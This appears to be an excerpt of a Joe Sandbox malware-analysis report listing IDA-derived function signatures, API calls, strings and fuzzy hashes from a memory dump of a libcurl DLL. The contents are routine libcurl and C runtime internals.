                                                                                                                                             • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$curl_msnprintf
                                                                                                                                            • String ID: %2I64d:%02I64d:%02I64d$%3I64dd %02I64dh$%7I64dd
                                                                                                                                            • API String ID: 2752550610-564197712
                                                                                                                                            • Opcode ID: 9aef403fddd49f75e8c1175ecab1653da4ed636645f0edc1b9e0fcc8910e9e67
                                                                                                                                            • Instruction ID: 5ddb93ba4c89fe56e710ed283edf3b3d6b3483fb5b0fc07cad4233ed44993cd4
                                                                                                                                            • Opcode Fuzzy Hash: 9aef403fddd49f75e8c1175ecab1653da4ed636645f0edc1b9e0fcc8910e9e67
                                                                                                                                            • Instruction Fuzzy Hash: F0416873B402087AEB205E7CAD42FAFBBA9DB84754F010174FD08EB280EA79DD1142E4
                                                                                                                                            APIs
                                                                                                                                            • curl_msnprintf.LIBCURL(?,00000005,%c%c%c%c,?,?,?,?), ref: 6B771B38
                                                                                                                                            • curl_msnprintf.LIBCURL(?,00000005,%c%c%c=,?,?,?), ref: 6B771B5D
                                                                                                                                            • curl_msnprintf.LIBCURL(?,00000005,%c%c==,?,?), ref: 6B771B79
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_msnprintf
                                                                                                                                            • String ID: %c%c%c%c$%c%c%c=$%c%c==$%ld%s
                                                                                                                                            • API String ID: 1809024409-1523555428
                                                                                                                                            • Opcode ID: 02d49fbc38c39be50e7d2a679689f6ff036e6bf9b5e81796a8feb0fb88a745b8
                                                                                                                                            • Instruction ID: 1b1d45e326cae68284283da1063238f2a902b1d88f6232c371ca681b1fb1bb71
                                                                                                                                            • Opcode Fuzzy Hash: 02d49fbc38c39be50e7d2a679689f6ff036e6bf9b5e81796a8feb0fb88a745b8
                                                                                                                                            • Instruction Fuzzy Hash: 2AB12C719042549FDB21DF68CD55BEA7BF8AF06304F0441F9F8A997242E738EA05CBA0
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(?,?,00000100), ref: 6B7AA0E7
                                                                                                                                            • _strncpy.LIBCMT ref: 6B7AA12D
                                                                                                                                            • _strrchr.LIBCMT ref: 6B7AA16D
                                                                                                                                            • _strrchr.LIBCMT ref: 6B7AA188
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 6B7AA1B3
                                                                                                                                            • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 6B7AA1C1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$_strrchr$_strncpy
                                                                                                                                            • String ID: Unknown error %d (%#x)
                                                                                                                                            • API String ID: 1320708361-2414550090
                                                                                                                                            • Opcode ID: 7edcfbaa2f938c09204b34a410d41c97228738fc3fd64dbda43ee02298b3c6cc
                                                                                                                                            • Instruction ID: 336044138e579888dff26e81083e120ee2c39e0fcd7404580fd4bfb8175f88ad
                                                                                                                                            • Opcode Fuzzy Hash: 7edcfbaa2f938c09204b34a410d41c97228738fc3fd64dbda43ee02298b3c6cc
                                                                                                                                            • Instruction Fuzzy Hash: F621E174A00208BFDB411F75AE4AB6F7BBCDF9625AF0001B9FC0496241EB29D90183B2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a7067de7cc67af4c37c5f0866a28f1dd42a07a6606844d2c2c2d593bfc2b3d3e
                                                                                                                                            • Instruction ID: dcdfa123ed9355da1904838faed77f6e31cb633c6a2c85392bf891de86973af6
                                                                                                                                            • Opcode Fuzzy Hash: a7067de7cc67af4c37c5f0866a28f1dd42a07a6606844d2c2c2d593bfc2b3d3e
                                                                                                                                            • Instruction Fuzzy Hash: 5AC1D675A142099FDB05CFA9CA86BAF7BB5BF4A314F0040ADF41097341C778EA41CB62
                                                                                                                                            Strings
                                                                                                                                            • Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT%s, xrefs: 6B77A935
                                                                                                                                            • Can't get the size of file., xrefs: 6B77A9CE
                                                                                                                                            • Content-Length: %I64d, xrefs: 6B77A87D
                                                                                                                                            • failed to resume file:// transfer, xrefs: 6B77AC25
                                                                                                                                            • Accept-ranges: bytes, xrefs: 6B77A8AC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___from_strstr_to_strchr
                                                                                                                                            • String ID: Accept-ranges: bytes$Can't get the size of file.$Content-Length: %I64d$Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT%s$failed to resume file:// transfer
                                                                                                                                            • API String ID: 601868998-1509146019
                                                                                                                                            • Opcode ID: 7bbc948e70d3f7f20df3354b11b44bda40d315c1b8889a93f2a9e19af558f236
                                                                                                                                            • Instruction ID: 0f45a9cc64cca0b5c79d835ac1c4c44969f28afbb3869e1bcbfbacda23fd1ffb
                                                                                                                                            • Opcode Fuzzy Hash: 7bbc948e70d3f7f20df3354b11b44bda40d315c1b8889a93f2a9e19af558f236
                                                                                                                                            • Instruction Fuzzy Hash: BFD1B171E042189BEF209B74DE45BEEB7B6AF45308F0044F9F90DA7251EB399A848F51
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • Request has same path as previous transfer, xrefs: 6B77D68E
                                                                                                                                            • Uploading to a URL without a file name!, xrefs: 6B77D5EB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___from_strstr_to_strchr_strncpy$_strrchr
                                                                                                                                            • String ID: Request has same path as previous transfer$Uploading to a URL without a file name!
                                                                                                                                            • API String ID: 2378022753-131330169
                                                                                                                                            • Opcode ID: e7b3e622aae76e5bce07140ad3cd9fe21bbc74d1272afc13997614563e9a6f94
                                                                                                                                            • Instruction ID: e057c8d7848389241259082027925f9649deae77935ba617d0d4756ae4eba817
                                                                                                                                            • Opcode Fuzzy Hash: e7b3e622aae76e5bce07140ad3cd9fe21bbc74d1272afc13997614563e9a6f94
                                                                                                                                            • Instruction Fuzzy Hash: 6091E9B0A44206ABDF24DF34DA45B9E7BB5EF02348F0441B8F81D9B241EB39E954CB94
                                                                                                                                            APIs
                                                                                                                                            • curl_mfprintf.LIBCURL(?,%s,00000000), ref: 6B77679A
                                                                                                                                            Strings
                                                                                                                                            • ## Fatal libcurl error, xrefs: 6B7767F5
                                                                                                                                            • %s, xrefs: 6B776792
                                                                                                                                            • # Netscape HTTP Cookie File# https://curl.haxx.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk., xrefs: 6B776707
                                                                                                                                            • %s.%s.tmp, xrefs: 6B7766C1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_mfprintf
                                                                                                                                            • String ID: ## Fatal libcurl error$# Netscape HTTP Cookie File# https://curl.haxx.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk.$%s$%s.%s.tmp
                                                                                                                                            • API String ID: 8901498-4087121635
                                                                                                                                            • Opcode ID: 0a35b546f79f0b353e9c1a36a3e0ee8ec33a341a59f5eeebd497fb1d1635e79a
                                                                                                                                            • Instruction ID: 8c82f8567f2d91b391718706ec82485ca8f2754e4d9a62bf8f4d7a1d3e871c53
                                                                                                                                            • Opcode Fuzzy Hash: 0a35b546f79f0b353e9c1a36a3e0ee8ec33a341a59f5eeebd497fb1d1635e79a
                                                                                                                                            • Instruction Fuzzy Hash: 8061E5B1A042499BDF10AFB4AA967BF7B749F06348F0400B9FD05A7206DB2DDB0587A1
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_mvsnprintf
                                                                                                                                            • String ID: %s%s%s$Couldn't set desired mode$Got a %03d response code instead of the assumed 200$LIST$NLST
                                                                                                                                            • API String ID: 3418963191-1262176364
                                                                                                                                            • Opcode ID: c7223775bd5376818bde9bef666f952483e175f1a3bddc2906e41eb50654af79
                                                                                                                                            • Instruction ID: a0df5d5f28b02ced3072980800a89919ac64dd3a1612dd60935e31e5bbb7a200
                                                                                                                                            • Opcode Fuzzy Hash: c7223775bd5376818bde9bef666f952483e175f1a3bddc2906e41eb50654af79
                                                                                                                                            • Instruction Fuzzy Hash: 71413B72B001186BEF206A78AD85FEE7BADDB457A9F0005B5FD09DB241E729DD0487E0
                                                                                                                                            APIs
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B78D9E9
                                                                                                                                            • curl_maprintf.LIBCURL(%.*s,00000000,?,?,?,?,?,?,?,?,?,00000000,?,CONNECT,00000000,00000001), ref: 6B78D9FE
                                                                                                                                              • Part of subcall function 6B7948E0: curl_mvaprintf.LIBCURL(?,?,?,6B7766CB,%s.%s.tmp,?,?,?,?,?,?), ref: 6B7948EA
                                                                                                                                            • curl_maprintf.LIBCURL(%sAuthorization: Digest %s,Proxy-,?), ref: 6B78DA61
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_maprintf$___from_strstr_to_strchrcurl_mvaprintf
                                                                                                                                            • String ID: %.*s$%sAuthorization: Digest %s$Digest$Proxy-
                                                                                                                                            • API String ID: 2694567262-3976116069
                                                                                                                                            • Opcode ID: eff8493abd213406885053fb21e4bfdc9e9abccaab66031ee8e2c3ec2be03769
                                                                                                                                            • Instruction ID: fd57944b005cd5d9e1e89684506f1b95d8338f5f3f249fc31c1f67bffc7cef6e
                                                                                                                                            • Opcode Fuzzy Hash: eff8493abd213406885053fb21e4bfdc9e9abccaab66031ee8e2c3ec2be03769
                                                                                                                                            • Instruction Fuzzy Hash: 77418071A04248AFDF01CFA8D985BAE7BE8EF45344F5040BAF808DB251E735DA508BA5
                                                                                                                                            APIs
                                                                                                                                            • curl_mime_data.LIBCURL(?,?,?), ref: 6B792917
                                                                                                                                            • curl_mime_filedata.LIBCURL(?,?), ref: 6B79292A
                                                                                                                                            • curl_mime_data_cb.LIBCURL(?,?,?,?,?,?,?), ref: 6B792955
                                                                                                                                            • curl_mime_init.LIBCURL ref: 6B792963
                                                                                                                                            • curl_mime_subparts.LIBCURL(?,00000000), ref: 6B792976
                                                                                                                                            • curl_mime_addpart.LIBCURL(00000000), ref: 6B79299D
                                                                                                                                            • curl_slist_free_all.LIBCURL(00000000,?), ref: 6B792A1B
                                                                                                                                            • curl_slist_free_all.LIBCURL(?,?), ref: 6B792A44
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_slist_free_all$curl_mime_addpartcurl_mime_datacurl_mime_data_cbcurl_mime_filedatacurl_mime_initcurl_mime_subparts
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3177825088-0
                                                                                                                                            • Opcode ID: 199250ca454a9da4a7a3a2d9bc5b6e31c073c9a38ef7678ea5764421eed66138
                                                                                                                                            • Instruction ID: 0f711b754132925c783b8e3f9cbcb45ed94b1550ea90c82e6be7aedb9ebab2a5
                                                                                                                                            • Opcode Fuzzy Hash: 199250ca454a9da4a7a3a2d9bc5b6e31c073c9a38ef7678ea5764421eed66138
                                                                                                                                            • Instruction Fuzzy Hash: A351E3B2A04515ABDF14BF28FA8659E7764FF05324B0401B9FD09AB701E73AE9209BD1
                                                                                                                                            APIs
                                                                                                                                            • curl_maprintf.LIBCURL(%sAuthorization: Negotiate %s,Proxy-,00000000,?,?,00000000,?), ref: 6B78DF14
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_maprintf
                                                                                                                                            • String ID: %sAuthorization: Negotiate %s$Curl_output_negotiate, no persistent authentication: cleanup existing context$HTTP$Negotiate auth restarted$Proxy-
                                                                                                                                            • API String ID: 3307269620-819322280
                                                                                                                                            • Opcode ID: 3685a4b0da620dd41c01b1bbcbf88267bda047b87f3596255ef73fec01b5f333
                                                                                                                                            • Instruction ID: e4b50baec223738d885c819fd5a1457a9e76c46955c8694da09f572644cf6831
                                                                                                                                            • Opcode Fuzzy Hash: 3685a4b0da620dd41c01b1bbcbf88267bda047b87f3596255ef73fec01b5f333
                                                                                                                                            • Instruction Fuzzy Hash: A891E171A042089FEB11CF68D984BDEBBF5EF45354F0444BEE858E7200D77AAA14CBA5
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                            • API String ID: 0-537541572
                                                                                                                                            • Opcode ID: 34e9cc2c502b863053a0e274f8a933e2dd1f319ad4b9f9b02db2eb46a684896f
                                                                                                                                            • Instruction ID: ddc7413f15a11a13d2df6e89effbcea2b54d58ca4f84740ae44424ec9806613e
                                                                                                                                            • Opcode Fuzzy Hash: 34e9cc2c502b863053a0e274f8a933e2dd1f319ad4b9f9b02db2eb46a684896f
                                                                                                                                            • Instruction Fuzzy Hash: E021A132D45625BFDF114A248E54B0F37A89F42BB0F110178FD65EF281D738E90985E6
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 6B7D5EB6: _free.LIBCMT ref: 6B7D5EDB
                                                                                                                                            • _free.LIBCMT ref: 6B7D5F3C
                                                                                                                                              • Part of subcall function 6B7CF7EA: RtlFreeHeap.NTDLL(00000000,00000000,?,6B7D5EE0,6B7F38A0,00000000,6B7F38A0,00000000,?,6B7D5F07,6B7F38A0,00000007,6B7F38A0,?,6B7D532A,6B7F38A0), ref: 6B7CF800
                                                                                                                                              • Part of subcall function 6B7CF7EA: GetLastError.KERNEL32(6B7F38A0,?,6B7D5EE0,6B7F38A0,00000000,6B7F38A0,00000000,?,6B7D5F07,6B7F38A0,00000007,6B7F38A0,?,6B7D532A,6B7F38A0,6B7F38A0), ref: 6B7CF812
                                                                                                                                            • _free.LIBCMT ref: 6B7D5F47
                                                                                                                                            • _free.LIBCMT ref: 6B7D5F52
                                                                                                                                            • _free.LIBCMT ref: 6B7D5FA6
                                                                                                                                            • _free.LIBCMT ref: 6B7D5FB1
                                                                                                                                            • _free.LIBCMT ref: 6B7D5FBC
                                                                                                                                            • _free.LIBCMT ref: 6B7D5FC7
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: a2040689eb20bcf9bb80bc7575afd7fe6432a9a444dbacbf3969c66c2c91fe63
                                                                                                                                            • Instruction ID: 5630d61a964aeba693dedb7a04af5596ffb1cfcb3dd6544ad21a40cf80970a88
                                                                                                                                            • Opcode Fuzzy Hash: a2040689eb20bcf9bb80bc7575afd7fe6432a9a444dbacbf3969c66c2c91fe63
                                                                                                                                            • Instruction Fuzzy Hash: 7E112C71941B04EFEB20FBB0DE4AFCB7B9DBF01745F800A1DB2AA6A050DB79A5044651
                                                                                                                                            APIs
                                                                                                                                            • curl_maprintf.LIBCURL(%s%s%s%s%s%s%I64d%s%s,#HttpOnly_,6B7DB98E,unknown,6B7DB988,6B7DB868,6B7DB988,100C15FF,5D8B6B7F,74DB8504,6B7DB98E,00000000,00000000,00000000), ref: 6B776B55
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_maprintf
                                                                                                                                            • String ID: #HttpOnly_$%s%s%s%s%s%s%I64d%s%s$FALSE$TRUE$unknown
                                                                                                                                            • API String ID: 3307269620-3622669638
                                                                                                                                            APIs
                                                                                                                                            • GetConsoleCP.KERNEL32(6B7C92EA,00000000,?), ref: 6B7CE504
                                                                                                                                            • __fassign.LIBCMT ref: 6B7CE6E3
                                                                                                                                            • __fassign.LIBCMT ref: 6B7CE700
                                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6B7CE748
                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6B7CE788
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6B7CE834
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4031098158-0
                                                                                                                                            APIs
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D266
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D27A
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D2CC
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D2F9
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D362
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D4C1
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 885266447-0
                                                                                                                                            APIs
                                                                                                                                            • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000004,?,?), ref: 6B7B500B
                                                                                                                                            • VerSetConditionMask.KERNEL32(00000000,?,00000001,00000004,?,?), ref: 6B7B5012
                                                                                                                                            • VerSetConditionMask.KERNEL32(00000000,?,00000020,00000005,?,00000001,00000004,?,?), ref: 6B7B501F
                                                                                                                                            • VerSetConditionMask.KERNEL32(00000000,?,00000010,00000005,?,00000020,00000005,?,00000001,00000004,?,?), ref: 6B7B5026
                                                                                                                                            • VerSetConditionMask.KERNEL32(00000000,?,00000008,00000001,?,00000010,00000005,?,00000020,00000005,?,00000001,00000004,?,?), ref: 6B7B5032
                                                                                                                                            • VerifyVersionInfoA.KERNEL32(0000009C,00000033,00000000), ref: 6B7B503F
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ConditionMask$InfoVerifyVersion
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2793162063-0
                                                                                                                                            APIs
                                                                                                                                            • htonl.WS2_32(?), ref: 6B7B65CA
                                                                                                                                            • htonl.WS2_32(?), ref: 6B7B6626
                                                                                                                                              • Part of subcall function 6B7A06B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,$lyk), ref: 6B7A06EF
                                                                                                                                              • Part of subcall function 6B7A06B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B7A072F
                                                                                                                                            Strings
                                                                                                                                            • GSSAPI handshake failure (invalid security layer), xrefs: 6B7B65BA
                                                                                                                                            • GSSAPI handshake failure (empty security message), xrefs: 6B7B6561, 6B7B681F
                                                                                                                                            • GSSAPI handshake failure (invalid security data), xrefs: 6B7B6583
                                                                                                                                            Similarity
                                                                                                                                            • API ID: htonl$curl_msnprintfcurl_mvsnprintf
                                                                                                                                            • String ID: GSSAPI handshake failure (empty security message)$GSSAPI handshake failure (invalid security data)$GSSAPI handshake failure (invalid security layer)
                                                                                                                                            • API String ID: 3222853418-242323837
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ../$/..$/../$/./
                                                                                                                                            • API String ID: 0-456519384
                                                                                                                                            APIs
                                                                                                                                            • curl_strnequal.LIBCURL(Set-Cookie:,00000000,0000000B,?,?,?,?,?,?,?), ref: 6B776449
                                                                                                                                            • curl_slist_free_all.LIBCURL(?), ref: 6B7764F5
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_slist_free_allcurl_strnequal
                                                                                                                                            • String ID: Set-Cookie:$ignoring failed cookie_init for %s$none
                                                                                                                                            • API String ID: 2653667558-4095489131
                                                                                                                                            APIs
                                                                                                                                            • curl_maprintf.LIBCURL(%sAuthorization: NTLM %s,Proxy-,00000000,?,?,?,?,?,?,00000000,?), ref: 6B78E253
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_maprintf
                                                                                                                                            • String ID: %sAuthorization: NTLM %s$HTTP$Proxy-
                                                                                                                                            • API String ID: 3307269620-3667642693
                                                                                                                                            APIs
                                                                                                                                            • curl_strnequal.LIBCURL(NTLM,6B78B6E6,00000004,00000DD0,?,?,?,6B78B6E6,?,?,?,?,?,?,00000000,?), ref: 6B78E00B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_strnequal
                                                                                                                                            • String ID: NTLM$NTLM auth restarted$NTLM handshake failure (internal error)$NTLM handshake rejected
                                                                                                                                            • API String ID: 482932555-2258391893
                                                                                                                                            APIs
                                                                                                                                            • curl_mvsnprintf.LIBCURL(?,00000801,00000000,$lyk), ref: 6B7A06EF
                                                                                                                                            • curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B7A072F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_msnprintfcurl_mvsnprintf
                                                                                                                                            • String ID: $lyk$...$...
                                                                                                                                            • API String ID: 4251218765-3253439172
                                                                                                                                            APIs
                                                                                                                                            • curl_getenv.LIBCURL(CURL_SSL_BACKEND,?,?,?,6B7BCB27,00000000,6B78692E), ref: 6B7BDA73
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_getenv
                                                                                                                                            • String ID: CURL_SSL_BACKEND$Pf~kPf~k
                                                                                                                                            • API String ID: 2452071183-429030350
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6B7CC475,?,?,6B7CC43D,?,00000000,?), ref: 6B7CC4D8
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6B7CC4EB
                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,6B7CC475,?,?,6B7CC43D,?,00000000,?), ref: 6B7CC50E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 6B7D5E65
                                                                                                                                              • Part of subcall function 6B7CF7EA: RtlFreeHeap.NTDLL(00000000,00000000,?,6B7D5EE0,6B7F38A0,00000000,6B7F38A0,00000000,?,6B7D5F07,6B7F38A0,00000007,6B7F38A0,?,6B7D532A,6B7F38A0), ref: 6B7CF800
                                                                                                                                              • Part of subcall function 6B7CF7EA: GetLastError.KERNEL32(6B7F38A0,?,6B7D5EE0,6B7F38A0,00000000,6B7F38A0,00000000,?,6B7D5F07,6B7F38A0,00000007,6B7F38A0,?,6B7D532A,6B7F38A0,6B7F38A0), ref: 6B7CF812
                                                                                                                                            • _free.LIBCMT ref: 6B7D5E77
                                                                                                                                            • _free.LIBCMT ref: 6B7D5E89
                                                                                                                                            • _free.LIBCMT ref: 6B7D5E9B
                                                                                                                                            • _free.LIBCMT ref: 6B7D5EAD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            Similarity
